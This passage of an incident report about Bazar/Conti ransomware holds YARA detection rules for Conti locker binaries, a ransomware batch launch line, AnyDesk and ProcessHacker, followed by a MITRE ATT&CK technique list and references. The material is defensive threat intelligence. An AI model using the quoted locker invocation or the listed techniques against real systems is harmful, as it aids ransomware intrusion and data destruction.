class="hljs-string">"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile"</span> ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr"</span> ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg"</span> ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar"</span> ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad "</span> ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">4000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> all of them } rule mal_host2_AnyDesk { meta: description = <span class="hljs-string">"mal - file AnyDesk.exe"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu"</span> ascii <span class="hljs-variable">$x2</span> = <span class="hljs-string">"C:\\Buildbot\\ad-windows-32\\build\\release\\app-32\\win_loader\\AnyDesk.pdb"</span> fullword ascii <span class="hljs-variable">$s3</span> = <span class="hljs-string">"<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu"</span> ascii <span class="hljs-variable">$s4</span> = <span class="hljs-string">"<assemblyIdentity version=\"6.3.2.0\" processorArchitecture=\"x86\" name=\"AnyDesk.AnyDesk.AnyDesk\" type=\"win32\" />"</span> fullword ascii <span class="hljs-variable">$s5</span> = <span class="hljs-string">"4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O"</span> fullword ascii <span class="hljs-variable">$s6</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G3"</span> fullword ascii <span class="hljs-variable">$s7</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G30"</span> fullword ascii <span class="hljs-variable">$s8</span> = <span class="hljs-string">"http://ocsp.digicert.com0N"</span> fullword ascii <span class="hljs-variable">$s9</span> = <span class="hljs-string">"http://www.digicert.com/CPS0"</span> fullword ascii <span class="hljs-variable">$s10</span> = <span class="hljs-string">"Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0"</span> fullword ascii <span class="hljs-variable">$s11</span> = <span class="hljs-string">"<description>AnyDesk screen sharing and remote control software.</description>"</span> fullword ascii <span class="hljs-variable">$s12</span> = <span class="hljs-string">"/http://crl3.digicert.com/sha2-assured-cs-g1.crl05"</span> fullword ascii <span class="hljs-variable">$s13</span> = <span class="hljs-string">"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L"</span> fullword ascii <span class="hljs-variable">$s14</span> = <span class="hljs-string">"%jgmRhZl%"</span> fullword ascii <span class="hljs-variable">$s15</span> = <span class="hljs-string">"5ZW:\"Wfh"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"5HRe:\\"</span> fullword ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">"ysN.JTf"</span> fullword ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">"Z72.irZ"</span> fullword ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"Ve:\\-Sj7"</span> fullword ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"ekX.cFm"</span> fullword ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">11000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> <span class="hljs-number">4</span> of them } rule ProcessHacker { meta: description = <span class="hljs-string">"mal - file ProcessHacker.exe"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe"</span> fullword wide <span class="hljs-variable">$x2</span> = <span class="hljs-string">"D:\\Projects\\processhacker2\\bin\\Release32\\ProcessHacker.pdb"</span> fullword ascii <span class="hljs-variable">$x3</span> = <span class="hljs-string">"ProcessHacker.exe"</span> fullword wide <span class="hljs-variable">$x4</span> = <span class="hljs-string">"kprocesshacker.sys"</span> fullword wide <span class="hljs-variable">$x5</span> = <span class="hljs-string">"ntdll.dll!NtDelayExecution"</span> fullword wide <span class="hljs-variable">$x6</span> = <span class="hljs-string">"ntdll.dll!ZwDelayExecution"</span> fullword wide <span class="hljs-variable">$s7</span> = <span class="hljs-string">"PhInjectDllProcess"</span> fullword ascii <span class="hljs-variable">$s8</span> = <span class="hljs-string">"_PhUiInjectDllProcess@8"</span> fullword ascii <span class="hljs-variable">$s9</span> = <span class="hljs-string">"logonui.exe"</span> fullword wide <span class="hljs-variable">$s10</span> = <span class="hljs-string">"Executable files (*.exe;*.dll;*.ocx;*.sys;*.scr;*.cpl)"</span> fullword wide <span class="hljs-variable">$s11</span> = <span class="hljs-string">"\\x86\\ProcessHacker.exe"</span> fullword wide <span class="hljs-variable">$s12</span> = <span class="hljs-string">"user32.dll!NtUserGetMessage"</span> fullword wide <span class="hljs-variable">$s13</span> = <span class="hljs-string">"ntdll.dll!NtWaitForKeyedEvent"</span> fullword wide <span class="hljs-variable">$s14</span> = <span class="hljs-string">"ntdll.dll!ZwWaitForKeyedEvent"</span> fullword wide <span class="hljs-variable">$s15</span> = <span class="hljs-string">"ntdll.dll!NtReleaseKeyedEvent"</span> fullword wide <span class="hljs-variable">$s16</span> = <span class="hljs-string">"ntdll.dll!ZwReleaseKeyedEvent"</span> fullword wide <span class="hljs-variable">$s17</span> = <span class="hljs-string">"\\kprocesshacker.sys"</span> fullword wide <span class="hljs-variable">$s18</span> = <span class="hljs-string">"\\SystemRoot\\system32\\drivers\\ntfs.sys"</span> fullword wide <span class="hljs-variable">$s19</span> = <span class="hljs-string">"_PhExecuteRunAsCommand2@36"</span> fullword ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"_PhShellExecuteUserString@20"</span> fullword ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">4000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> <span class="hljs-number">4</span> of them } rule unlocker { meta: description = <span class="hljs-string">"mal - file unlocker.exe"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53"</span> strings: <span class="hljs-variable">$s1</span> = <span class="hljs-string">"For more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline"</span> fullword wide <span class="hljs-variable">$s2</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G20"</span> fullword ascii <span class="hljs-variable">$s3</span> = <span class="hljs-string">" <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>"</span> fullword ascii <span class="hljs-variable">$s4</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G2"</span> fullword ascii <span class="hljs-variable">$s5</span> = <span class="hljs-string">"Causes Setup to create a log file in the user's TEMP directory."</span> fullword wide <span class="hljs-variable">$s6</span> = <span class="hljs-string">"Prevents the user from cancelling during the installation process."</span> fullword wide <span class="hljs-variable">$s7</span> = <span class="hljs-string">"Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file."</span> fullword wide <span class="hljs-variable">$s8</span> = <span class="hljs-string">" <dpiAware xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">true</dpiAware>"</span> fullword ascii <span class="hljs-variable">$s9</span> = <span class="hljs-string">"The Setup program accepts optional command line parameters."</span> fullword wide <span class="hljs-variable">$s10</span> = <span class="hljs-string">"Instructs Setup to load the settings from the specified file after having checked the command line."</span> fullword wide <span class="hljs-variable">$s11</span> = <span class="hljs-string">"Overrides the default component settings."</span> fullword wide <span class="hljs-variable">$s12</span> = <span class="hljs-string">"/MERGETASKS=\"comma separated list of task names\""</span> fullword wide <span class="hljs-variable">$s13</span> = <span class="hljs-string">"/PASSWORD=password"</span> fullword wide <span class="hljs-variable">$s14</span> = <span class="hljs-string">"Specifies the password to use."</span> fullword wide <span class="hljs-variable">$s15</span> = <span class="hljs-string">"yyyyvvvvvvvvvxxw"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"yyyyyyrrrsy"</span> fullword ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">" processorArchitecture=\"x86\""</span> fullword ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">" processorArchitecture=\"x86\""</span> fullword ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"Prevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requ"</span> wide <span class="hljs-variable">$s20</span> = <span class="hljs-string">"/DIR=\"x:\\dirname\""</span> fullword wide condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">7000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">8</span> of them } rule mal_host2_locker { meta: description = <span class="hljs-string">"mal - file locker.bat"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"_locker.exe -m -net -size 10 -nomutex -p"</span> ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x7473</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">8</span>KB <span class="hljs-keyword">and</span> <span class="hljs-variable">$x1</span> } import "pe" rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker { meta: description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe" author = "The DFIR Report" reference = "https://thedfirreport.com" date = "2021-11-29" hash1 = "9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219" strings: $s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii $s2 = "operator co_await" fullword ascii $s3 = ">*>6>A>_>" fullword ascii /* hex encoded string 'j' */ $s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s5 = "Bapi-ms-win-core-fibers-l1-1-1" fullword wide $s6 = "SVWjEhQ" fullword ascii $s7 = ";F;[;l;" fullword ascii /* Goodware String - occured 1 times */ $s8 = "74787@7H7P7T7\\7p7" fullword ascii /* Goodware String - occured 1 times */ $s9 = "6#606B6" fullword ascii /* Goodware String - occured 1 times */ $s10 = "<!=X=u=" fullword ascii /* Goodware String - occured 1 times */ $s11 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */ $s12 = "6!7?7J7" fullword ascii /* Goodware String - occured 2 times */ $s13 = "delete" fullword ascii /* Goodware String - occured 2789 times */ $s14 = "4!4(4/464=4D4K4R4Z4b4j4v4" fullword ascii /* Goodware String - occured 3 times */ $s15 = ".CRT$XIAC" fullword ascii /* Goodware String - occured 3 times */ $s16 = "0#0)01060\\0a0" fullword ascii $s17 = ";\";/;=;K;V;l;" fullword ascii $s18 = "6,606P6X6\\6x6" fullword ascii $s19 = "6(6,6@6D6H6L6P6T6X6\\6`6d6p6t6x6|6" fullword ascii $s20 = "8 :M:}:" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 600KB and ( pe.imphash() == "50472e0ba953856d228c7483b149ea72" or all of them ) } rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86 { meta: description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll" author = "The DFIR Report" reference = "https://thedfirreport.com" date = "2021-11-29" hash1 = "01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9" strings: $s1 = "conti_v3.dll" fullword ascii $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii $s3 = "6 7/787E7[7" fullword ascii /* hex encoded string 'gx~w' */ $s4 = "operator co_await" fullword ascii $s5 = "2%3.3f3~3" fullword ascii /* hex encoded string '#?3' */ $s6 = "1\"1&1,:4:<:D:L:T:\\:d:l:t:|:" fullword ascii $s7 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s8 = "SVWjEhQ" fullword ascii $s9 = "__swift_2" fullword ascii $s10 = "__swift_1" fullword ascii $s11 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */ $s12 = "7K7P7T7X7\\7" fullword ascii /* Goodware String - occured 1 times */ $s13 = "7h7o7v7}7" fullword ascii /* Goodware String - occured 1 times */ $s14 = "O0a0s0" fullword ascii /* Goodware String - occured 1 times */ $s15 = ";?;I;S;" fullword ascii /* Goodware String - occured 1 times */ $s16 = "8>8C8Q8V8" fullword ascii /* Goodware String - occured 1 times */ $s17 = "QQSVj8j@" fullword ascii $s18 = "5-5X5s5" fullword ascii /* Goodware String - occured 1 times */ $s19 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */ $s20 = "delete" fullword ascii /* Goodware String - occured 2789 times */ condition: uint16(0) == 0x5a4d and filesize < 600KB and ( pe.imphash() == "749dc5143e9fc01aa1d221fb9a48d5ea" or all of them ) } rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64 { meta: description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll" author = "The DFIR Report" reference = "https://thedfirreport.com" date = "2021-11-29" hash1 = "31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a" strings: $s1 = "conti_v3.dll" fullword ascii $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii $s3 = "operator co_await" fullword ascii $s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s5 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */ $s6 = "__swift_2" fullword ascii $s7 = "__swift_1" fullword ascii $s8 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */ $s9 = "u3HcH<H" fullword ascii /* Goodware String - occured 2 times */ $s10 = "D$XD9x" fullword ascii /* Goodware String - occured 2 times */ $s11 = "delete" fullword ascii /* Goodware String - occured 2789 times */ $s12 = "ue!T$(H!T$ " fullword ascii $s13 = "L$&8\\$&t,8Y" fullword ascii $s14 = "F 2-by" fullword ascii $s15 = "u\"8Z(t" fullword ascii $s16 = "L$ |+L;" fullword ascii $s17 = "vB8_(t" fullword ascii $s18 = "ext-ms-" fullword wide $s19 = "OOxq*H" fullword ascii $s20 = "H97u+A" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 600KB and ( pe.imphash() == "137fa89046164fe07e0dd776ed7a0191" or all of them ) } </code></pre> <h3 id="mitre">MITRE</h3> <pre><code>T1218<span class="hljs-number">.010</span> - Signed Binary Proxy Execution: Regsvr32 T1218<span class="hljs-number">.005</span> - Signed Binary Proxy Execution: Mshta T1218<span class="hljs-number">.011</span> - Signed Binary Proxy Execution: Rundll32 T1567<span class="hljs-number">.002</span> - Exfiltration Over Web Service: Exfiltration to Cloud Storage T1105 - Ingress Tool Transfer T1059<span class="hljs-number">.005</span> - Command and Scripting Interpreter: Visual Basic T1059<span class="hljs-number">.007</span> - Command and Scripting Interpreter: JavaScript T1059<span class="hljs-number">.001</span> - Command and Scripting Interpreter: PowerShell T1055 - Process Injection T1486 - Data Encrypted <span class="hljs-keyword">for</span> Impact T1482 - Domain Trust Discovery T1047 - Windows Management Instrumentation T1021<span class="hljs-number">.002</span> - Remote Services: SMB/Windows Admin Shares T1124 - System Time Discovery T1021<span class="hljs-number">.001</span> - Remote Services: Remote Desktop Protocol T1566<span class="hljs-number">.001</span> - Phishing: Spearphishing Attachment T1087<span class="hljs-number">.002</span> - Account Discovery: Domain Account T1087<span class="hljs-number">.001</span> - Account Discovery: Local Account T1057 - Process Discovery T1083 - File and Directory Discovery T1590<span class="hljs-number">.005</span> - Gather Victim Network Information: IP Addresses </code></pre> <h3 id="mitre-software">MITRE Software</h3> <pre><code><span class="hljs-title">Net</span> – S0039 Nltest – S0359 Cmd – S0106 Tasklist – S0057 Cobalt Strike – S0154 AdFind - S0552 </code></pre> <h3 id="references">Reference</h3> <ul> <li>Detecting Rclone – An Effective Tool for Exfiltration, NCC Group – <a href="https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" target="_blank" rel="noopener">https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/</a></li> <li>Rundll32, Red Canary – <a href="https://redcanary.com/threat-detection-report/techniques/rundll32/" target="_blank" rel="noopener">https://redcanary.com/threat-detection-report/techniques/rundll32/</a></li> <li>TA551 (Shathak) continues pushing BazarLoader, infections lead to Cobalt Strike, SANS ISC – <a href="https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/" target="_blank" rel="noopener">https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/</a></li> <li>Invoke-ShareFinder, GitHub [Veil PowerView] – <a href="https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1" target="_blank" rel="noopener">https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1</a></li> <li>taskmgr.exe slashing numbers, Hexicorn – <a href="https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/" target="_blank" rel="noopener">https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/</a></li> </ul> <p>Internal case #5794</p> </div> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-4690" class="share-twitter sd-button share-icon" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/?share=twitter" target="_blank" title="Click to share on Twitter" ><span>Twitter</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-4690" class="share-linkedin sd-button share-icon" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/?share=linkedin" target="_blank" title="Click to share on LinkedIn" ><span>LinkedIn</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/?share=reddit" target="_blank" title="Click to share on Reddit" ><span>Reddit</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-4690" class="share-facebook sd-button share-icon" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/?share=facebook" target="_blank" title="Click to share on Facebook" ><span>Facebook</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp" ><span>WhatsApp</span></a></li><li class="share-end"></li></ul></div></div></div> <div id='jp-relatedposts' class='jp-relatedposts' > <h3 class="jp-relatedposts-headline"><em>Related</em></h3> </div> </div> <footer class="entry-footer"> <div class="entry-meta"> </div> </footer> </div> </article> <nav class="navigation post-navigation" aria-label="Posts"> <h2 class="screen-reader-text">Post navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" rel="prev">Exchange Exploit Leads to Domain Wide Ransomware</a></div><div class="nav-next"><a href="https://thedfirreport.com/2021/12/13/diavol-ransomware/" rel="next">Diavol Ransomware</a></div></div> </nav> </main> </div> <aside id="secondary" class="widget-area"> <section id="search-4" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://thedfirreport.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search …" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></section><section id="google_translate_widget-5" class="widget widget_google_translate_widget"><div id="google_translate_element"></div></section><section id="block-7" class="widget widget_block"> <div class="wp-block-jetpack-subscriptions__supports-newline wp-block-jetpack-subscriptions"> <div class="wp-block-jetpack-subscriptions__container is-not-subscriber"> <form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="175340963" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog" > <div class="wp-block-jetpack-subscriptions__form-elements"> <p id="subscribe-email"> <label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text" > Type your email… </label> <input required="required" type="email" name="email" class="no-border-radius " style="font-size: 16px;padding: 15px 23px 15px 23px;border-radius: 0px;border-width: 1px;" placeholder="Type your email…" value="" id="subscribe-field" title="Please fill in this field." /> </p> <p id="subscribe-submit" > <input type="hidden" name="action" value="subscribe"/> <input type="hidden" name="blog_id" value="175340963"/> <input type="hidden" name="source" value="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/"/> <input type="hidden" name="sub-type" value="subscribe-block"/> <input type="hidden" name="app_source" value=""/> <input type="hidden" name="redirect_fragment" value="subscribe-blog"/> <input type="hidden" name="lang" value="en_US"/> <input type="hidden" id="_wpnonce" name="_wpnonce" value="a187300299" /><input type="hidden" name="_wp_http_referer" value="/2021/11/29/continuing-the-bazar-ransomware-story/" /><input type="hidden" name="post_id" value="4690"/> <button type="submit" class="wp-block-button__link no-border-radius" style="font-size: 16px;padding: 15px 23px 15px 23px;margin: 0; margin-left: 10px;border-radius: 0px;border-width: 1px;" name="jetpack_subscriptions_widget" > Subscribe </button> </p> </div> </form> </div> </div> </section><section id="block-21" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://the-dfir-report-store.myshopify.com/products/dfir-labs-ctf-july-6-16-00-20-00-utc"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2024/06/ctf-1.png" alt="" class="wp-image-35571 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2024/06/ctf-1.png 200w, https://thedfirreport.com/wp-content/uploads/2024/06/ctf-1-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h4 class="wp-block-heading"><a href="https://the-dfir-report-store.myshopify.com/products/dfir-labs-ctf-july-6-16-00-20-00-utc">Register For Our Next CTF</a></h4> </div></div> </section><section id="block-8" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/monitor5-s.png" alt="" class="wp-image-21332 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/monitor5-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/monitor5-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/" data-type="link" data-id="https://thedfirreport.com/">Reports</a></h3> </div></div> </section><section id="block-9" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/threat-intelligence/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/cloud4-s.png" alt="" class="wp-image-21334 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/cloud4-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/cloud4-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></h3> </div></div> </section><section id="block-10" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/detection-rules/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/warning4-s.png" alt="" class="wp-image-21336 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/warning4-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/warning4-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></h3> </div></div> </section><section id="block-16" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/dfir-labs/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2024/04/labs-s.png" alt="" class="wp-image-31051 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2024/04/labs-s.png 200w, https://thedfirreport.com/wp-content/uploads/2024/04/labs-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a></h3> </div></div> </section><section id="block-12" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/mentoring-coaching-program/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/help4-s.png" alt="" class="wp-image-21333 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/help4-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/help4-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring and Coaching</a></h3> </div></div> </section></aside> </div> </div> </div> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="copyright-area"> <div class="wrap"> <div class="site-info"> <a href="https://wordpress.org/"> Proudly powered by WordPress</a> <span class="sep"> | </span> Copyright 2023 | The DFIR Report | All Rights Reserved </div> <div class="footer-right-info"> </div> </div> </div> </footer> <button href="#" class="back-to-top" type="button"><i class="fa-solid fa-arrow-up-long"></i>Go Top</button> </div> <script type="text/javascript"> window.WPCOM_sharing_counts = {"https:\/\/thedfirreport.com\/2021\/11\/29\/continuing-the-bazar-ransomware-story\/":4690}; </script> <style id='jetpack-block-subscriptions-inline-css' type='text/css'> .is-style-compact .is-not-subscriber .wp-block-button__link,.is-style-compact .is-not-subscriber .wp-block-jetpack-subscriptions__button{border-end-start-radius:0!important;border-start-start-radius:0!important;margin-inline-start:0!important}.is-style-compact .is-not-subscriber .components-text-control__input,.is-style-compact .is-not-subscriber p#subscribe-email input[type=email]{border-end-end-radius:0!important;border-start-end-radius:0!important}.is-style-compact:not(.wp-block-jetpack-subscriptions__use-newline) .components-text-control__input{border-inline-end-width:0!important}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form-container{display:flex;flex-direction:column}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline:not(.wp-block-jetpack-subscriptions__use-newline) .is-not-subscriber .wp-block-jetpack-subscriptions__form-elements{align-items:flex-start;display:flex}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline:not(.wp-block-jetpack-subscriptions__use-newline) p#subscribe-submit{display:flex;justify-content:center}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield 